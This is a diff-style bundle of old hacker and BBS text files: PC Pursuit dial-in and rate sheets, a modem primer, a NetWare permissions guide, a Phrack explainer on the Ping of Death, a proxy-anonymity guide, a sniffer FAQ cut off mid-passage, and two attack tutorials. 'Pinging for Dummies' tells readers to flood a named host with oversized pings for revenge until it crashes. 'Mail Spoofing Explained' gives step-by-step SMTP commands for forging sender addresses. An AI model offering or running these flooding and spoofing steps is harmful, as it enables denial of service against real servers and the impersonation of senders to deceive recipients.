(Some exchanges must use 1602 + phone number
please check AZPHO.xch for details)
Pittsburgh, PA 412 D/PAPIT/12
D/PAPIT/24
Portland, OR 503 D/ORPOR/3
D/ORPOR/12
D/ORPOR/24
Research Triangle Park, NC 919 D/NCRTP/3
D/NCRTP/12
D/NCRTP/24
Sacramento, CA 916 D/CASAC/3
D/CASAC/12
D/CASAC/24
(Some exchanges must use 1 + phone number
please check CASAC.xch for details)
Salt Lake City, UT 801 D/UTSLC/3
D/UTSLC/12
D/UTSLC/24
San Diego, CA 619 D/CASDI/3
D/CASDI/12
D/CASDI/24
San Francisco, CA 415 \ D/CASFA/3
> D/CASFA/12
510 / D/CASFA/24
(for 510, must use 1510 + phone number)
San Jose, CA 408 \ D/CASJO/3
510 > D/CASJO/12
415 / D/CASJO/24
(for 415, must use 1415 + phone number)
(for 510, must use 1510 + phone number)
Santa Ana, CA 714 \ D/CASAN/3
310 > D/CASAN/12
909 / D/CASAN/24
(for 909, must use 1909 + phone number)
(for 310, must use 1310 + phone number)
Seattle, WA 206 D/WASEA/3
D/WASEA/12
D/WASEA/24
St. Louis, MO 314 \ D/MOSLO/3
> D/MOSLO/12
618 / D/MOSLO/24
(for 618, must use 1618 + phone number)
Tampa, FL 813 D/FLTAM/3
D/FLTAM/12
D/FLTAM/24
Washington, DC 202 \ D/DCWAS/3
703 > D/DCWAS/12
301 / D/DCWAS/24
(for 703, must use 703 + phone number)
(for 301, must use 301 + phone number)
Note: /3 = 300 bps, /12 = 1200 bps, /24 = 2400 baud
File diff suppressed because it is too large Load Diff
File diff suppressed because it is too large Load Diff
+146
View File
@@ -0,0 +1,146 @@
Copyright 1997, Michael Thompson, all rights reserved.
------------------------------------------------------
The First part of StuBoy's Netware hacking tips... compliments of StuBoy
-----------------------------------------------------------------------
These are not really hacking tips, but, more of a command guide useful
for whatever. (he he he)
This explains about the rights of Novell Netware 3.12
The rest of the parts will need the preknowldge of the rights of Novell.
These are mostly harmless and can be played around with,
**** with the exception of the EXUCUTE ONLY attrib. ******
Rights explained- (My short summary)- In netware users have set rights
attached to their login scripts of where they can go, what they can view,
and what they can do. The way rights work is like this....
A DIRECTORY TREE
root (the root dir)
|
|-------------|
courses public (courses and public are sub dirs
| | of root)
|----------| |---------|
students admin dos win (sub dirs of COURSES and PUBLIC)
:if you have any rights to courses then you have the same rights to the sub
dirs and their sub dirs and... *Unless the sysop changes the IRM (below)
*file rights work on a one file basis.
---------------------------------------
*purging- this command is used through out- (summary)- When files are
deleted in NetWare, NetWare saves them in salvagable state until disk
space is needed, then it just writes over them. There is a NetWare
utility called SALVAGE which allows a user to "undelete" files that have
not been purged. Purging (explain in part two) clears these files from
the server so they may not be SALVAGED.
*The commands to add and modify Netware rights/file attribs/dir attribs are
NOT dos functions. They will be explained in part two.
---- All right abbrevs are in the same case as seen in NetWare.
1:Trustee Rights (user rights)
Name Abbreviation Explanation
---- ------------ -----------
-Read R dir-open/read files in dir
file-open/read file
-Write W dir-open/write to files in dir
file-open/write file
-Create C dir-create subdirs, files,and write to files
file-allows salvage (see salvage in work
station utils-part two)
-Erase E dir-del dir,files, and sub dirs
file-del file
-Modify M dir-change name/attrib of dirs/sub dirs
and file attribs
-File Scan F dir-view file names and sub dirs
file-view file name
-Access Control A dir-change dir IRM and trustee assignments
file-change file IRM and trustee assignments
(see IRM below)
-Supervisory S dir-all rights to files and sub dirs
file-all rights to file
* supervisory rights cannot be removed *
*** IRM- Inhetited Rights Mask- allows the sysop to block certain rights,
of the sub dirs, from the parent dirs. (if you have questions email me)
(this is only way I can think of the descibe this right now)
---------------------------------------------------------------------------
2: Novell File attributes (different from DOS attribs)
Name Abbreviation Explanation
---- ------------ -----------
-Read Only Ro -<duh>
-Read/Write Rw -<duh>
-Sharable S -Several users may open file at same
time.
-Archive A -Assigned to files that have been changed
needed since last back-up
-Exucute Only X -Prevents exucutables from being copied,
changed, or deleted.
** assigned by supervisor only **
** Once assigned cannot be removed **
-Hidden H -hides files cannot be seen with DOS <dir>
command; must use <NDIR>; prevents files
from being copied/deleted.
-System Sy -system files; hidden, copy inhibit, and
delete inhibit.
-Transaction T -Use on database files; allows NTT system to
to protect files from being corrupted.
(see NTT at bottom)
-Purge P -Purges files as soon as the file is deleted
-Read Audit Ra -not used (supposedly)
-Write Audit Wa -not used (supposedly)
-Copy Inhibit CI -Prevents Mac files from being copied
-Delete Inhibit DI -Prevents users from deleting files
-Rename Inhibint RI -Prevnets users from renaming files
*NTT-NetWare's Transactional Tracking system- protects database files from
being corrupted by such things as power loss.
-------------------------------------------------------------------------
3: NetWare Directory attribs
Name Abbreviation Explanation
---- ------------ -----------
-System S -Indicates sys dirs(such as dos); protects
with H,CI(in dos), and DI attribs
-Hidden H -Hides dirs; has DI,CI attribs; cannot view
with DOS's dir; use <NDIR>
-Delete Inhibit DI -Prevents users from deleting dir
-Purge P -Purges files when deleted in dir
-Rename Inhibit RI -Prevents users from renaming dir
-Normal N -clears all other attibs from dir
+54
View File
@@ -0,0 +1,54 @@
NEW USER INFORMATION
====================
With PC PURSUIT, you can explore a wealth of free resources and even
discover more uses for your PC. In any of the locations accessible to
PC PURSUIT, you have the ability to:
* communicate with friends and associates on-line,
* download and upload public domain software from
thousands of Bulletin Board Systems in the 34 PC
PURSUIT cities,
* research professional projects and personal hobbies
through free databases, and
* shop and advertise in electronic catalogs.
The features and benefits offered by PC PURSUIT SERVICE include:
Portability:
------------
Because the service is widely accessible, you can use
PC PURSUIT at home, at the office, or travelling.
Accessibility:
--------------
The service can be accessed from nearly 9000 local
telephone exchanges via the Sprintnet network. You can
dial thousands of free databases at 300, 1200, and 2400
bps in 34 major cities across the nation, 24 hours a day.
Convenient Billing:
------------------
All PC PURSUIT service charges are billed directly to
your VISA, MASTERCARD, or AMERICAN EXPRESS account, or
to your checking account.
Nonstop Support:
---------------
As with all other Sprintnet services, The Sprintnet Network
Control Center provides 24-hour management to ensure
reliable data transmission. Customer Service is available
to handle system problem reports 24 hours a day at
1-800-877-5045.
START SAVING TODAY AND JOIN THE THOUSANDS OF PC USERS FROM COAST TO
COAST WHO ARE ALREADY ENJOYING THE COST-EFFECTIVE WORLD OF PC
COMMUNICATIONS THROUGH PC PURSUIT. CALL TO REGISTER AT 1-800-
736-1130 (voice) OR 1-800-877-2006 (modem).

+162
View File
@@ -0,0 +1,162 @@
*******************
PINGING FOR DUMMIES
*******************
-=[ESQ]=-
Intro:
======
have you ever played a multiplayer game with a crappy modem and
wondered why you kept getting "ping timed out"??? there's a little fun
program in your windows folder which does all the pinging for you...
and it's called ping (ooooo, aaaaahhhhh). it's a dos prog which slows
down other computers to let you into the mainstream of things. take
the internet for example. before you are connected, there are millions
of other people on the internet already who are all using up room,
they can only use so much room because the world isn't made out of
money... so when you connect, their entitled space gets a little
smaller, which slows you down. it's the same with multiplayer games,
your computer may seem alot faster when you are in a server with
one person, but when you enter a server with 20 people, depending on
your computer stats, it may seem slow and choppy. i'm here to show you
how to take advantage of pinging.
How Do I Take Advantage Of Pinging?:
====================================
what i mean by "taking advantage of pinging" is pinging someone to
death, or slowing someone down so bad that they crash or don't
perform the same. doesn't that sound fun? naturally you can ping
anything to death if it has an IP (xxx.xxx.xxx.xxx) or an ISP
(blah.blah.net) the stuff in the brackets for the IPs are numbers, and
in the ISPs, the blahs or usually words and the ending isn't always
.net... it's sometimes .com or .org. so if your looking for revenge on
someone who's connected, get there ip or isp. once you have this
information you might want to write it down because it's sometimes hard
to remember all of it. now, once it's written down, open up MS DOS
Prompt. you know DOS, the black background with a crappy white font.
it should look like this:
C:\>_
Now the pinging program is in the
windows folder, so type [cd windows] now it should look like this...
C:\WINDOWS>_
just type [ping] and that will start the program. once
it's started it will show the usage, and the options that you can do
with it. looking like this:
C:\WINDOWS>ping
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list
Options:
-t Ping the specified host until stopped.
To see statistics and continue -type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.
C:\WINDOWS>_
You probably have a good idea of whats going on now, but for all those
lamers out there you probably don't understand a single thing in the
options part. i'm too lazy to explain anymore, so just get your mom to
explain things to you. right beside some of the letters you have to
put a value, such as count, size, or timeout. those values must be
numbers. some have specific boundaries which cannot go lower or higher
etc, etc... for instance, the buffer size value must be within 0 and
65500. 65500 being the max, you'd most likely want to use that number.
You may have trouble with this, so here's an example of a disliked
server that i like picking on...
C:/>_
C:/>cd windows
C:/WINDOWS>
C:/WINDOWS>ping
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list
Options:
-t Ping the specified host until stopped.
To see statistics and continue -type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.
C:/WINDOWS>
C:/WINDOWS>ping -t -l 65500 -w 10 freedownload.dhs.org
*Explanation*
the above ping command line says that i want to ping
freedownload.dhs.org with max buffer capabilities with 10 millisecond
intervals until its dead.
Is This The End?
================
you might be thinking, "how do you know when the target's crashed?"
or "how do you know if it's working?" once you've entered the ping
command line, you will get a response saying:
Reply from xxx.xxx.xx.xxx: bytes=xxxxx time=xxxxms TTL=240
the only thing that you should be watching is the time column which
should change every response. once the time starts to get higher,
you know that it's working and soon it will give a response like:
Request timed out.
And that's what you want, because it's telling you that you're pinging
the server with so much data that it's unable to respond so it's
slowing down and it will soon crash. you'll know when it's about to
crash when the response turns to:
No resources.
Just because it says, "no resources." it doesn't mean that you can
stop. to crash a server it needs a lot of bruising. and to bruise a
server takes a lot of time. pinging a server with the program once is
fun, but try running 3 or 4 of the programs at the same time and
watch the responses! who knew that DOS could be so much fun?
**********
DISCLAIMER
**********
Throw a rock up in the air, it's bound to hit someone guilty
-=[ESQ]=-
Questions or Comments?
shoveit@upyour.com
+95
View File
@@ -0,0 +1,95 @@
Large Packet Attacks
(AKA Ping of Death)
---------------------------------
[ Introduction ]
Recently, the Internet has seen a large surge in denial of service
attacks. A denial of service attack in this case is simply an action of some
kind that prevents the normal functionality of the network. It denies service.
This trend began a few months back with TCP SYN flooding and continues with the
"large packet attack". In comparison with SYN flooding, the large packet attack
is a much more simple attack in both concept (explained below) and execution
(the attack can be carried out by anyone with access to a Windows 95 machine).
TCP SYN flooding is more complex in nature and does not exploit a flaw so much
as it exploits an implementation weakness.
The large packet attack is also much more devastating then TCP SYN
flooding. It can quite simply cause a machine to crash, whereas SYN flooding
may just deny access to mail or web services of a machine for the duration of
the attack. For more information on TCP SYN flooding see Phrack 49, article 13.
(NOTE: The large packet attack is somewhat misleadingly referred to as 'Ping of
Death` because it is often delivered as a ping packet. Ping is a program that
is used to test a machine for reachablity to see if it alive and accepting
network requests. Ping also happens to be a convenient way of sending the
large packet over to the target.)
The large packet attack has caused no end of problems to countless
machines across the Internet. Since its discovery, *dozens* of operating
system kernels have been found vulnerable, along with many routers, terminal
servers, X-terminals, printers, etc. Anything with a TCP/IP stack is in fact,
potentially vulnerable. The effects of the attack range from mild to
devastating. Some vulnerable machines will hang for a relatively short period
time then recover, some hang indefinitely, others dump core (writing a huge
file of current memory contents, often followed by a crash), some lose
all network connectivity, many rebooted or simply gave up the ghost.
[ Relevant IP Basics ]
Contrary to popular belief, the problem has nothing to do with the
`ping` program. The problem lies in the IP module. More specifically,
the problem lies the in the fragmentation/reassembly portion of the IP module.
This is portion of the IP protocol where the packets are broken into smaller
pieces for transit, and also where they are reassembled for processing. An IP
packet has a maximum size constrained by a 16-bit header field (a header is a
portion of a packet that contains information about the packet, including
where it came from and where it is going). The maximum size of an IP packet
is 65,535 (2^16-1) bytes. The IP header itself is usually 20 bytes so this
leaves us with 65,515 bytes to stuff our data into. The underlying link layer
(the link layer is the network logically under IP, often ethernet) can seldom
handle packets this large (ethernet for example, can only handle packets up to
1500 bytes in size). So, in order for the link layer to be able to digest a
large packet, the IP module must fragment (break down into smaller pieces)
each packet it sends to down to the link layer for transmission on the network.
Each individual fragment is a portion of the original packet, with its own
header containing information on exactly how the receiving end should put it
back together. This putting the individual packets back together is called
reassembly. When the receiving end has all of the fragments, it reassembles
them into the original IP packet, and then processes it.
[ The attack ]
The large packet attack is quite simple in concept. A malicious user
constructs a large packet and sends it off. If the destination host is
vulnerable, something bad happens (see above). The problem lies in the
reassembly of these large packets. Recall that we have 65,515 bytes of space
in which to stuff data into. As it happens, a few misbehaved applications
(and some specially crafted evil ones) will allow one to place slightly more
data into the payload (say 65,520 bytes). This, along with a 20 byte IP
header, violates the maximum packet size of 65,535 bytes. The IP module will
then simply break this oversized packet into fragments and eschew them to
their intended destination (target). The receiving host will queue all of the
fragments until the last one arrives, then begin the process of reassembly.
The problem will surface when the IP module finds that the packet is in
fact larger than the maximum allowable size as an internal buffer is
overflowed. This is where something bad happens (see above).
[ Vulnerability Testing and Patching ]
Testing to see if a network device is vulnerable is quite easy.
Windows NT and Windows 95 will allow construction of these oversized
packets without complaining. Simply type: `ping -l 65508 targethost`. In
this case, we are delivering an oversized IP packet inside of a ping packet,
which has a header size of 8 bytes. If you add up the totals, 20 bytes of IP
header + 8 bytes of ping header + 65,508 bytes of data, you get a 65,536 byte
IP packet. This is enough to cause affected systems to have problems.
Defense is preventative. The only way to really be safe from this
attack is to either ensure your system is patched, or unplug its network tap.
There are patches available for just about every vulnerable system. For
a copious list of vulnerable systems and patches, check out a 'Ping of Death'
webpage near you.
daemon9
Editor, Phrack Magazine
(daemon9@netcom.com)
+58
View File
@@ -0,0 +1,58 @@
Using web proxies to disguise your IP address.
----------------------------------------------------------------------
-------------------------- By Hardcore Pawn
<hardcorepawn@cyberdude.com> http://members.tripod.com/~hardcorepawn/
----------------------------------------------------------------------
-------------------------- A lot of people have been concerned
recently about their anonymity on the internet. Deleting cookies etc.
and paying money for services like the anonymizer. Well here's an easy
(and free) way to get around this problem. Use the proxy machines of
other servers.
----------------------------------------------------------------------
-------------------------- Finding them is pretty easy, the best way
is probably the ping program. From a MS-DOS window in Win95 (or from
your shell) type: ping proxy.name-of-some-isp.net If you a message
like 'bad IP' then there's no such machine but if you get ICMP echo
information, then obviously there is. Also you can try looking around
the isp/companies web site for information, or perhaps a forged
(probably too busy, unconcerned to check.) email to the system admin
asking if they have a proxy machine. If you need the addresses of some
ISPs check out yahoo.com
----------------------------------------------------------------------
-------------------------- To use a proxy through your web browser, in
Netscape, click on Options|Network Preferences then click on the
'Proxies' tab and check the radio button 'Manual Proxy config' and
then click the 'view' button. Set it up for whatever protocols you
want, (some proxies might only support HTTP) probably FTP and HTTP.
*Most* proxy machines operate on port 8080 but not always. Email the
admin and ask. Be polite :) In Internet Explorer, click View|Options|
then click on the 'Connection' tab and set it up a la Netscape.
----------------------------------------------------------------------
--------------------------- Once you have done this properly, you're
real IP address won't show up on: Guestbooks, counterlogs. WWW Boards.
Java/html chat rooms. Anonymous FTP through your browser. Cookies will
be useless. So don't bother with the anonymizer. Allowed into
'customer only' FTP servers. Many isp's have 'customer only' sections
of their web sites (through CGI) you can access them and find out
stuff about their servers, get free counters etc. *Also* if you have
a "web email" account (Hotmail, Rocketmail, etc.) if you post a
message through the web interface, the IP of the proxy and *not* that
of yours will show up.
----------------------------------------------------------------------
--------------------------- A WORD OF WARNING. It is probably not safe
to use the proxy for hacking (denial of service attacks via anon ftp
or whatever) as the owner of the proxy machine would probably give
away your IP address to whoever you've been picking on. *Also* some
squid (common) proxies do give your real IP for certain cgi requests.
----------------------------------------------------------------------
--------------------------- Here are some proxy machines:
proxy.cybercity.dk:8080 <Denmark>
proxy.mersinet.co.uk:8080 <England>
proxy.compuserve.com:8080
Lots more out there but I don't wanna make it too easy :)
----------------------------------------------------------------------
--------------------------- Copyright 1997/98 Hardcore Pawn
<hardcorepawn@cyberdude.com>
+66
View File
@@ -0,0 +1,66 @@
PC Pursuit Rate Schedule
Effective July 1, 1989
Administrative Charges: Registration Fee
Payable on a one time basis when Telenet
receives and processes your order. $30/order
Password Change Fee
Payable each time a new password is
issued. $5/password
Membership Fees: Regular Membership
Includes up to 30 hours of non-prime time
usage. $30/month
Family Membership
Includes up to 60 hours of non-prime time
usage. $50/month
Handicapped Membership
Includes up to 90 hours of non-prime time
usage. $30/month
Access Charges: Non-Prime Hours
Usage exceeding membership limits. $3/hour
Prime Hours $10.50/hour
Notes:
1) Non-Prime Time hours are: 6:00 P.M. - 7:00 A.M. local time Monday through
Thursday; 6:00 P.M. Friday to 7:00 A.M. Monday. All day, New Year's Day, July
4th, Labor Day, Thanksgiving, and Christmas Day.
2) Prime Time hours are: 7:00 A.M. - 6:00 P.M. local time Monday through
Friday.
3) Usage is rounded to the nearest minute for purpose of calculating total
usage on each connection. All calls are subject to a minimum call duration of
two minutes unless they are 90 seconds or less. Calls of 90 seconds or less
are not billed.
4) Any portion of a call to Pursuit during prime time will result in the
entire session being billed at prime time rates.
5) Sales tax will be billed as applicable and is not included in the fixed
monthly fees.
6) A Regular Membership will allow access for one subscriber at the Regular
Membership rate using single ID and password. Family Membership will allow
one subscriber, or one subscriber and their immediate family members,
access at the Family Membership rate using a single password and ID.
7) Handicapped membership guidelines are posted to the NetExchange Bulletin
Board System and are available upon request from Sprint.
8) All of Sprint's PC Pursuit charges will be billed the month following
actual usage.
9) There may be charges to you for the use of the online computer systems to
which you gain access through PC Pursuit. These charges, if any, will be
billed to you by those operating the online computer systems and not by
Sprint.

+238
View File
@@ -0,0 +1,238 @@
The Racal-Vadic Primer v1.0
-----------------------------------------------------
DISCLAIMER
------------
Please be aware that since this mode is unsupported, there is the
possibility that SprintNet could start using a different brand of modem
which would render this feature invalid. You are strictly on your own and
therefore can not hold SprintNet responsible for not making this mode
available.
Furthermore, this text was prepared ad hoc and is in no way a definitive
guide to the operation and/or use of either PC Pursuit or the Racal-Vadic
mode described herein. Any errors or ommisions are my own and I am sorry for
any inconvience this may cause you. Please understand that by using this
method of dialing you are totaly responsible for your actions and any
consequences as a result of said use.
OVERVIEW
----------
The Racal-Vadic mode is an unsupported and to date, poorly documented
feature of the outdial modems that are currently in use with PC Pursuit.
It enables you to better understand what is happening at the other end of
your connection by telling you what is happening. This type of operation is
known as "call progression" because it gives you a response as the modem
progresses through the phone call.
ACITVATING AND DEACTIVATING THE MODE
--------------------------------------
The first thing we will cover is how to activate and de-activate the
Racal-Vadic mode. Some of you may have already experienced the rather
unexpected "MANUAL ANSWER" response after entering the Hayes command
"ATZ". What has happened is that you have connected with a modem that
is already in the Racal-Vadic mode of operation. When you entered "ATZ",
the 'A' was sensed by the modem as the command to manualy answer the
phone line. If this happens, just press your return key. This will make
the modem return to command mode signified by the '*' prompt. While at
this prompt you could enter an 'I' and then press return. This will make
the modem <I>dle the Racal-Vadic mode and return you to the Hayes mode
of operation.
If, on the other hand, you were to receive the normal "OK" response
from the modem after entering the "ATZ" command. You can activate the
Racal-Vadic mode by entering <CTRL>-E and pressing the return key. The
modem will now respond with "HELLO, I'M READY" and the '*' prompt.
To summarize activation and de-activation:
From the Hayes mode - <CTRL>-E and <RETURN> - to activate.
From the '*' prompt - <I> and <RETURN> - to de-activate.
I suggest getting into the habit of sending the de-activation sequence
when you first connect to a city node so that you know exactly what mode
the modem is in. You should also send an "ATZ" to make sure that the modem
is operational by seeing if the modem sends you back an "OK" response.
You can then send the activation command to enter Racal-Vadic mode.
There are two cases where the modem will return by itself to the Hayes
mode. The first is after you connect to a BBS. The other is while you're
at the command prompt and haven't entered anything for a short period of
time.
DIALING
---------
Now your ready to dial a phone number using the Racal-Vadic mode.
To do this, just enter a 'D' followed by the number you wish to dial.
For example, "D1234567", (pressing return of course!) will dial 123-4567.
Well, we've dialed a phone number, what now? After all, any modem can
dial a number, right? But not every modem can tell you what follows...
RESPONSE MESSAGES
-------------------
The following is a short description of each response the Racal-Vadic
mode can give you while dialing. They are, for the most part, self-
explanatory. But there are a few things you should consider with some of
them and I'll point those out just in case.
DIALING... - The modem has detected a dial tone and is now dialing
the phone number.
NO DIAL TONE - Just what it means, no dial tone was detected. Try again,
if you keep getting this then there is something wrong with
either the modem or the telephone line on that end. Contact
Customer Support and tell them you experienced this, tell
them the city node you were connected to also.
BUSY! - A busy signal has been detected. This is not the same
kind of BUSY as you'd get in the Hayes mode. There is
circuitry in the modem that can sense a busy signal, so
it will return to the command mode quicker to allow you
to decide what to do next. (Please see my note about the
BUSY response below also)
RINGING... - Self-explanatory.
ANSWER TONE - Self-explanatory.
ON LINE - Self-explanatory.
FAILED CALL - The phone rang for ten times with no answer. Either the
the BBS you called is down or no longer in existence, or
you reached someone's home and they weren't there.
REDIALING A NUMBER
--------------------
After you have received a BUSY! response you can re-dial the same
phone number up to 9 times with the 'R' command. To use this command,
enter an "R" and press the return key.
DISCONNECTING WHILE ONLINE
----------------------------
In a manner similar to the "+++" "ATH" Hayes command sequence, there
is a two control code sequence that will dis-connect you from the BBS
you are connected to. To activate it press <CTRL>-C then <CTRL>-D.
Prior to disconnecting from the city node, make sure the modem is not
in Racal-Vadic mode by issuing the <I>dle command. Be nice to others that
may not be aware of this mode of operation yet!
OTHER COMMANDS
----------------
The command 'P' or '?' will print the following list of commands that
the modem is designed to use. Since these are not needed in order to use
the Racal-Vadic mode effectively they will not be discusssed. This list
is here purely for your information.
A MANUAL ANSWER
D DIAL NUMBER
G MANUAL ORGINATE
I IDLE
K PAUSE
O OPTIONS
P,? PRINT MENU
R REDIAL
T TABLE OF OPTIONS
CONTROL A ALB TEST
CONTROL (CD) DISCONNECT
CONTROL D REQUEST DLB TEST
CONTROL H BACKSPACE
BEWARE THE BUSY
-----------------
The BUSY! response primarily indicates that the phone number you dialed
was busy, common sense tell you that. What I want to point out to you in
this section is that there are other possibilities that could mean that
something else is actually occuring.
a. CONTINUOUS BUSIES
----------------------
The first thing to be aware of is SprintNet's exchange lock-out feature.
This prevents you from making a long-distance call or any local calls
to exchanges that SprintNet would be charged more than is profitable. All
you will know is that you constantly get BUSY! responses when you dial a
certain phone number. The response tends to be returned from the modem
much quicker then a legitimate BUSY! for a valid phone number. This is
not a hard and fast rule though. Two methods that are available to you
for determining if this is the cause of the continuous busies are:
1. - Check the exchange lists provided by SprintNet, if the exchange is
not listed for the number your calling, you may as well stop
wasting anymore time calling that number. It is a victim of the
exchange lock-out.
2. - If the exchange is listed but you've always received a BUSY!
response, try this. Hang-up from SprintNet and dial the number
direct. If you hear a busy signal you can continue trying some
more, you may have latched onto a very, very busy system. But
if the phone rings, hang-up immediately. This way you won't be
charged for the call. You should then leave word with Customer
Support or on the Net-Exchange that this happened. SprintNet may
have a typo concerning that exchange.
b. RINGING... BUSY!
---------------------
There are a few things that can cause this. Although I'm not talking
about the RING BUSY RING BUSY... loop that can occure when you first
connect to a city node. You can get out of that by rapidly and repeatedly
sending an "ATZ" to the modem in an effort to break out of the loop. There
is a narrow window where this will succeed, but it can be done.
The main cause of this is by dialing a person's phone instead of a BBS.
This will usually be followed by a variable number of rings prior to
getting the BUSY!. Make certain that the phone number you have is really
a BBS. If you've never called that BBS before, you may have a case where
the BBS folded and someone else received the phone number after the sysop
canceled that phone line. A BBS less than 6 months old or with less than
24 hour access can be highly suspect. New and odd-hour BBS's tend to come
and go rather often.
If you want to continue to dial this number, first call direct to make
sure that it isn't a person's phone. Constantly getting a carrier signal
in your ear is not a pleasurable experience. You would also be doing them
a favor by letting them know that their new phone number used to be a
BBS. If that's the case they've probably been getting a ton of bizzare
calls, especially late at night, and could benefit from your call so that
they can get their number changed.
If, on the other hand, you receive a carrier signal, try the other
Baud rate. if that doesn't work you could have reached a private system
that is looking for a logon sequence immediately or will dis-connect you.
Another possibility is that the BBS you've called has bombed and the
modem is dutifully answering calls but there is no computer program
operating to give you feed-back.
CAVEAT
--------
What I've tried to cover here are the most common things that you may
run into. But, by no means have I covered every base. There are points
that I may have passed over completely because they have become second
nature to me. Others may have not been explained to your satisfaction for
the very same reason. And still other aspects may have been ignored because
I'm simply not aware of them. In each and every case I ask you to leave
word on the Net-Exchange as to what subjects are deficient or missing. That
way I can expand this text to include your suggestions for the benefit of
others.
Thank you and good luck!
Jack Radigan
+63
View File
@@ -0,0 +1,63 @@
Mail Spoofing Explained
NOTE: this was written with newbies in mind, thats why it's so simple and
through. If you're more advanced, bear with it :)
Ok, here is the most through, and explained mail spoofing article ever
writen. First of all, let's define mail spoofing. Have you ever wanted to
mail somebody annonymously? Have you ever wanted to send mail from adresses
such as nasa.com, fbi.org, or just about anything else? Of course you have!
All we need is a telnet client. This method uses a very simple thing called
smtp, which stands for Simple Mail Transfer Protocol. Wait, don't run away
yet, it may sound complicated but it really isn't. Here are the steps you
have to take:
* telnet to port 25 of any web server
* type: mail from: spoofed@adress.com
* type: rcpt to: recipient@of.the.letter.org
* type: data
* type: your message here
* type: .
Does this seam unclear to you? Well, I thought of that, below are step by
step instructions for windows95:
If you're runing win 95:
* click on start, and chose run
* type: telnet in the dialog box
* press enter-a telnet client pops up
* click on "terminal" menu
* chose preferences
* make sure that "Enable local echo" is checked
* click on the "connect" menu
* click on "remote system"-a dialog box pops up
* enter any adress in the dialog box (example: www.omnics.co.jp)
* see where it says "port" delete the stuff inside, and type number 25
* click connect
Ok, now we're connected to the host, see the little greeting message? good.
Now issue the following command just like you see them: Replace the
xxx@xxx.xxx.xxx with anything you want, my personal favorite is
president@whitehouse.org be creative ;)
* mail from: xxx@xxx.xxx.xxx
* rcpt to: place the adress where you wanna send the mail to here
* data
* type your message here
* .
* (yes, that is a period by itself ;)
Boom, you're done, the mail has been sent :) Wanna hear a funny thing? This
isn't even illegal :)
Here's a more info on this, which is intented for a bit more advanced
users, newbies are welcome to read this too, it explains how this works.
You see, port 25 is the mail port. When you telnet to the mail port, you
get to talk to the mail daemon. Mail daemons, speak smpt. Interested in
learning more about smpt? After connecting to the host, just type "help"
and you'll get some commands to play around with.
by: Duncan Silver
www.hackersclub.com/uu
+458
View File
@@ -0,0 +1,458 @@
Sniffer FAQ
Version: 1.7
-------------------------------------------------------------------------------
This Security FAQ is a resource provided by:
Internet Security Systems, Inc.
2000 Miller Court West Tel: (770) 441-2531
Norcross, Georgia 30071 Fax: (770) 441-2431
- Internet Scanner ... the most comprehensive "attack simulator"
available. -
-------------------------------------------------------------------------------
To get the newest updates of Security files check the following services:
mail info@iss.net with "send index" in message
http://iss.net/
ftp iss.net /pub/
-------------------------------------------------------------------------------
This Sniffer FAQ will hopefully give administrators a clear understanding of
sniffing problems and hopefully possible solutions to follow up with. Sniffers
is one of the main causes of mass break-ins on the Internet today.
This FAQ will be broken down into:
* What a sniffer is and how it works
* Where are sniffers available
* How to detect if a machine is being sniffed
* Stopping sniffing attacks:
o Active hubs
o Encryption
o Kerberos
o One-time password technology
o Non-promiscuous interfaces
-------------------------------------------------------------------------------
What a sniffer is and how it works
Unlike telephone circuits, computer networks are shared communication channels.
It is simply too expensive to dedicate local loops to the switch (hub) for each
pair of communicating computers. Sharing means that computers can receive
information that was intended for other machines. To capture the information
going over the network is called sniffing.
Most popular way of connecting computers is through ethernet. Ethernet protocol
works by sending packet information to all the hosts on the same circuit. The
packet header contains the proper address of the destination machine. Only the
machine with the matching address is suppose to accept the packet. A machine
that is accepting all packets, no matter what the packet header says, is said
to be in promiscuous mode.
Because, in a normal networking environment, account and password information
is passed along ethernet in clear-text, it is not hard for an intruder once
they obtain root to put a machine into promiscuous mode and by sniffing,
compromise all the machines on the net.
-------------------------------------------------------------------------------
Where are sniffers available
Sniffing is one of the most popular forms of attacks used by hackers. One
special sniffer, called Esniff.c, is very small, designed to work on Sunos, and
only captures the first 300 bytes of all telnet, ftp, and rlogin sessions. It
was published in Phrack, one of the most widely read freely available
underground hacking magazines. You can find Phrack on many FTP sites. Esniff.c
is also available on many FTP sites such as coombs.anu.edu.au:/pub/net/log.
You may want to run Esniff.c on an authorized network to quickly see how
effective it is in compromising local machines.
Other sniffers that are widely available which are intended to debug network
problems are:
* Etherfind on SunOs4.1.x
* Snoop on Solaris 2.x and SunOs 4.1 (on ftp playground.sun.com)
* Tcpdump 3.0 uses bpf for a multitude of platforms.
* Packetman, Interman, Etherman, Loadman works on the following platforms:
SunOS, Dec-Mips, SGI, Alpha, and Solaris. It is available on
ftp.cs.curtin.edu.au:/pub/netman/[sun4c|dec-mips|sgi|alpha|solaris2]/
[etherman-1.1a|interman-1.1|loadman-1.0|packetman-1.1].tar.Z
Packetman was designed to capture packets, while Interman, Etherman, and
Loadman monitor traffic of various kinds.
DOS based sniffers
* Gobbler for IBM DOS Machines
* ethdump v1.03
Available on ftp
ftp.germany.eu.net:/pub/networking/inet/ethernet/ethdp103.zip
* ethload v1.04
Companion utility to a ethernet monitor. Available on ftp
ftp.germany.eu.net:/pub/networking/monitoring/ethload/ethld104.zip
Commercial Sniffers are available at:
* Network General.
Network General produces a number of products. The most
important are the Expert Sniffer, which not only sniffs on the
wire, but also runs the packet through a high-performance expert
system, diagnosing problems for you. There is an extension onto
this called the "Distributed Sniffer System" that allows you to
put the console to the expert sniffer on you Unix workstation
and to distribute the collection agents at remote sites.
* Microsoft's Net Monitor
" My commercial site runs many protocols on one wire - NetBeui,
